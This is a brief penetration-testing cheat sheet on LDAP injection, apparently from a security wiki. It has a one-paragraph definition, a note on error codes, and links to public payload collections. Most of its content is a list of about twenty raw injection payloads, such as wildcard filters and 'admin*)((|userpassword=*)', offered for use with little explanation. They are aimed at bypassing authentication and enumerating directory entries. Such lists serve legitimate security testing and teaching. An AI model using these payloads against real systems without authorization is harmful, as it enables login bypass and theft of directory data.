LDAP Injection is a type of security vulnerability that can occur in web applications that use Lightweight Directory Access Protocol (LDAP) for authentication and/or authorization. It is a form of injection attack similar to SQL injection, but instead of targeting a database, it targets an LDAP server.
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
When testing for LDAP Injection, sometimes only an error will be output in the response. For example, the error code 0x80005000 :
{% embed url="https://learn.microsoft.com/en-us/answers/questions/566916/exception-unknown-error-(0x80005000)-while-creatin" %}
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
{% embed url="https://book.hacktricks.xyz/pentesting-web/ldap-injection" %}
{% embed url="https://portswigger.net/kb/issues/00100500_ldap-injection" %}